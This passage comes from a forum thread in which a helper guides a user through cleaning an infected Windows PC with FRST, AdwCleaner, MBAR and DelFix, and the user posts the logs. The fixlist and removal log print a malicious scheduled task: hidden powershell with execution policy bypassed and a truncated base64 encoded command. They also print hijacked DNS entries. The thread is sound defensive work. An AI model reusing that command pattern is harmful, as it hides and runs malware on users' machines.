Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3
Google Update Helper (x32 Version: 1.3.23.0 - BonanzaDeals) Hidden <==== Pažnja!
Task: {329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\iWin Games\iWinGames.exe
C:\Program Files (x86)\iWin Games
Task: {7BA99F3F-3AD7-4FC0-A115-AF54B5160A69} - System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwAgADsAIAA7ACAAIAAgADsAOwA7ACAAOwAgADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (unos podatka ima 8180 više karaktera).
AlternateDataStreams: C:\ProgramData\Temp:059167AF [96]
AlternateDataStreams: C:\ProgramData\Temp:44E16D4A [130]
AlternateDataStreams: C:\ProgramData\Temp:69FE2EE4 [130]
AlternateDataStreams: C:\ProgramData\Temp:7AF0BE36 [290]
AlternateDataStreams: C:\ProgramData\Temp:800FE171 [135]
AlternateDataStreams: C:\Users\mm\AppData\Local:3tM8462TIRzq5MSeqy2LDH3K [2212]
AlternateDataStreams: C:\Users\mm\AppData\Local\Temp:0pJux9gssYDdw1uoaBa3fmAWEK1A [2128]
Hosts:
EmptyTemp:


2. Save the Notepad file to the Desktop under the name fixlist.txt
You can also do this from Notepad => click File, then Save As, and in the new window, at the bottom under File Name, enter fixlist.txt as the name.
Note: It is important that both files, FRST and fixlist, are in the same location, otherwise the fix will not work.

3. Run FRST/FRST64 again, click the Fix button once and wait.
If the tool asks for a system restart, allow it and make sure the tool completes the fix after the restart.



The tool will create a log (Fixlog.txt) on the Desktop. Copy the contents of that log into your reply.
Note: If the tool warns you that a newer version exists, make sure to download and use the updated copy of FRST.



After that,

Download AdwCleaner and save it to the Desktop.
Double-click to run the program.
In the EULA window click I agree.
In Options, turn off Reset Winsock settings if it is on.
Click the Scan button and wait for the scan to finish.
Click the Cleaning button and wait for the program to finish.
The program will close all running programs and show a window with that warning. Click OK to confirm.
In the next two windows that open (Informations and Restart required) click OK.

The computer will restart and then open Notepad (C:\Adwcleaner\AdwCleaner[C1].txt) with the report.
Save that report to the Desktop and attach it to your reply using the "Attach file" option.

offline
  • Joined: 02 Feb 2013
  • Posts: 82
  • Location: Beograd

Posted: 09 Dec 2016 0:10

Izveštaj ispravaka od Farbar Recovery Scan Tool (x64) Verzija: 07-12-2016
Pokrenuo mm (08-12-2016 23:32:23) Run:1
Pokrenuto sa C:\Users\mm\Desktop\first
Učitani Profili: mm (Dostupani Profili: mm)
Režim pokretanja sistema: Normal
==============================================

fixlist sadržaj:
*****************
CreateRestorePoint:
CloseProcesses:
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3
Google Update Helper (x32 Version: 1.3.23.0 - BonanzaDeals) Hidden <==== Pažnja!
Task: {329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\iWin Games\iWinGames.exe
C:\Program Files (x86)\iWin Games
Task: {7BA99F3F-3AD7-4FC0-A115-AF54B5160A69} - System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwAgADsAIAA7ACAAIAAgADsAOwA7ACAAOwAgADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (unos podatka ima 8180 više karaktera).
AlternateDataStreams: C:\ProgramData\Temp:059167AF [96]
AlternateDataStreams: C:\ProgramData\Temp:44E16D4A [130]
AlternateDataStreams: C:\ProgramData\Temp:69FE2EE4 [130]
AlternateDataStreams: C:\ProgramData\Temp:7AF0BE36 [290]
AlternateDataStreams: C:\ProgramData\Temp:800FE171 [135]
AlternateDataStreams: C:\Users\mm\AppData\Local:3tM8462TIRzq5MSeqy2LDH3K [2212]
AlternateDataStreams: C:\Users\mm\AppData\Local\Temp:0pJux9gssYDdw1uoaBa3fmAWEK1A [2128]
Hosts:
EmptyTemp:
*****************

Tačka vraćanja je uspešno kreirana.
Procesi su zatvoreni uspešno.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}\\NameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}\\SystemComponent => vrednost uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E}" => ključ uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E}" => ključ uspešno uklonjeno
C:\WINDOWS\System32\Tasks\RunAsStdUser Task => uspešno premešteno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunAsStdUser Task" => ključ uspešno uklonjeno
"C:\Program Files (x86)\iWin Games" => nije pronađena.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BA99F3F-3AD7-4FC0-A115-AF54B5160A69}" => ključ uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BA99F3F-3AD7-4FC0-A115-AF54B5160A69}" => ključ uspešno uklonjeno
C:\WINDOWS\System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => uspešno premešteno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12}" => ključ uspešno uklonjeno
C:\ProgramData\Temp => ":059167AF" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":44E16D4A" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":69FE2EE4" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":7AF0BE36" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":800FE171" ADS uspešno uklonjeno.
C:\Users\mm\AppData\Local => ":3tM8462TIRzq5MSeqy2LDH3K" ADS uspešno uklonjeno.
C:\Users\mm\AppData\Local\Temp => ":0pJux9gssYDdw1uoaBa3fmAWEK1A" ADS uspešno uklonjeno.
C:\Windows\System32\Drivers\etc\hosts => uspešno premešteno
Hosts uspešno vraćeno u predhodno stanje.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 32728454 B
Java, Flash, Steam htmlcache => 787 B
Windows/system/drivers => 12163779 B
Edge => 0 B
Chrome => 16111922 B
Firefox => 21604822 B
Opera => 992687250 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 199630 B
systemprofile32 => 560 B
LocalService => 416878 B
NetworkService => 8956952 B
mm => 55765854 B

RecycleBin => 0 B
EmptyTemp: => 1.1 GB privremeni podaci Uklonjeni.

================================


Sistemu je potreban ponovno pokretanje.

==== Kraj od Fixlog 23:36:29 ====

Update: 09 Dec 2016 0:34

Everything is OK now.
Thanks for your time and effort. Cheers

offline
  • Joined: 02 Jan 2008
  • Posts: 2167

Excellent. Let's do just one more check.

Download Malwarebytes Anti-Rootkit (MBAR) from the following link and save it to the Desktop.

Double-click the program icon to run MBAR:
- Click OK in the next window to allow extraction into a separate mbar folder on the desktop;
- mbar.exe will be started. On some systems this may take a few extra seconds, so wait for it to start;
- In the introductory window, click the Next button if you agree;

• In the 'Update Database' window, click the Update button to download fresh definitions. When the message 'Success: Database was successfully updated' appears, click the Next button;
• Under the 'Scan Targets' section, check that all options are ticked, then click the Scan button;

Note: with some infections, one of the following messages may appear:
- 'Could not load protection driver' => in that case click OK.
- 'Could not load DDA driver' => click Yes on that notice to allow loading after a restart. Allow the restart and continue with the rest of the instructions after the restart.

>> If no malware is detected, click the Exit button to close the program. In your next post, include the mbar-log-year-month-day (hour-minute-second).txt and system-log.txt reports.

>> If infection(s) are found, check that the 'Create Restore Point' option is ticked and click the Cleanup! button to remove the threats.
- The malware removal procedure (scheduled) will be scheduled for the next restart; a notice will be shown in a pop-up window. Click the Yes button and the system should restart and complete the cleaning procedure.



Note! Only if a rootkit was detected: make sure to run the fixdamage.exe tool located in the mbar folder, \Plugins\fixdamage.exe:
- Double-click fixdamage; in the black window that opens (command prompt) type Y (Y stands for Yes) to continue execution, and wait for the tool to complete all repairs ...
- When you see the message 'press any key to exit' the repair is complete. Press any key on the keyboard to close the window. Restart the system.

The following reports will be created in the mbar folder.
1. mbar-log-year-month-day (hour-minute-second).txt
2. system-log.txt

Copy the contents of the mbar log into your post and attach the system log to the post using the Attach file option.

offline
  • Joined: 02 Feb 2013
  • Posts: 82
  • Location: Beograd

Sorry for the delay, but as I said, everything is OK now.

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
malwarebytes.org

Database version:
main: v2016.12.10.08
rootkit: v2016.11.20.01

Windows 8.1 x64 NTFS
Internet Explorer 11.0.9600.18161
mm :: PC_WIN9 [administrator]

11.12.2016. 1:43:25
mbar-log-2016-12-11 (01-43-25).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 385575
Time elapsed: 2 hour(s), 13 minute(s), 47 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

Thanks again

offline
  • Joined: 02 Jan 2008
  • Posts: 2167

offline
  • Joined: 02 Feb 2013
  • Posts: 82
  • Location: Beograd

Here are the logs (attachments 1 and 2).

offline
  • Joined: 02 Jan 2008
  • Posts: 2167

All right. Sorry for the wait.

We are done here and your computer is currently clean as far as malware is concerned.

The next procedure will perform the final cleanup.

Download Xplode's DelFix tool and save it to the Desktop.

Double-click to run the tool and tick the boxes in front of the following options:
Remove disinfection tools
Create registry backup
Purge System Restore

Click the Run button and wait a moment for the tool to finish its work.

From this point on, all tools used in this topic should be deleted.
If any tool or report was not removed, feel free to delete them manually.

The tool will also create a report for you. (C:\DelFix.txt)
- The tool will also save a healthy state of the registry and make a backup using the integrated "ERUNT" program in %windir%\ERUNT\DelFix
- DelFix deletes old System Restore points and creates a new, fresh point after the cleanup.
